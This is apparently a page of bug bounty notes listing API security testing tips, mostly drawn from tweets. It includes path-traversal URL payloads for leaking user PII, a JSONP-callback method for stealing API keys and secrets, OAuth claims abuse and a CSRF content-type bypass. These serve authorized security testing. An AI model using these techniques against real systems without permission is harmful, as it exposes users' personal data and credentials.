# API

* [BugBountyTip: If you playing with `API ENDPOINT` always try to send `INVALID CONTENT TYPE` end-up by getting hidden endpoints in `RESPONSE`](https://twitter.com/XSaadAhmedX/status/1145052664046206976)
* [good start of the month /api/something - 400 /api/something?filter=all - 200 found in a four-year-old private program with almost 1000 resolved reports. Bugs are still there, don't get intimidated by how many searched on that program.](https://twitter.com/bogdantcaciuc7/status/1234667685343948803)
* <https://medium.com/bugbountywriteup/31-tips-api-security-pentesting-480b5998b765>
* [Login to program -> param miner enabled found jsonp callback on every api call, content type converted to javascript -> made a quick html to receive the function callback -> steal account generated api keys and secrets -> fastest p1/p2 of the week.](https://twitter.com/MasterSEC_AR/status/1262969981098229761)
* If you are testing a JSON endpoint, always try to change one letter in the parameter names to make them invalid. I had quite a few cases where the server thrown back an error with all of the accepted parameters.
* Leak PII sensitive API Users DATA with URL Path Permutations: /api/users/user\@email.com -> /api/users/..%<2Fuser@email.com> or /api/account/123/ -> /api/account/..%2F..%2F123 Enjoy! [#bugbountyTip](https://twitter.com/hashtag/bugbountyTip?src=hashtag_click) [#bugbounty](https://twitter.com/hashtag/bugbounty?src=hashtag_click)[@bugbounty\_world](https://twitter.com/bugbounty_world) [#BtyPlz](https://twitter.com/hashtag/BtyPlz?src=hashtag_click) [#infosec](https://twitter.com/hashtag/infosec?src=hashtag_click)[![Image](https://pbs.twimg.com/media/D7Rvs9TWsAAq9Un?format=jpg\&name=medium)](https://twitter.com/akita_zen/status/1131652331471347712/photo/1)
* [When testing OpenID Connect or OAuth 2.0 and you got the client\_id: Always consider/check the same authentication request as the UserInfo endpoint to retrieve PII information by adding the "claims" parameter! Developers so often use the same authentication URI as UserInf](https://twitter.com/ApiDiary/status/1426218707756457995?s=20)o

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-Mj7oPLWoKjAV8ExUUgb%2F-Mj7q1fNgwBQj_TAP7fR%2Fimage.png?alt=media\&token=b5b653f9-1b0a-42fc-8940-8a3af09057d9)

* [Perhaps you're attacking an API with a solid CORS configuration, and your form-based CSRF attack using "text/plain" is failing because the server replies that it expects "application/json". Try this trick... 1/3 #bugbountytips](https://twitter.com/jub0bs/status/1432025054108430346?s=20)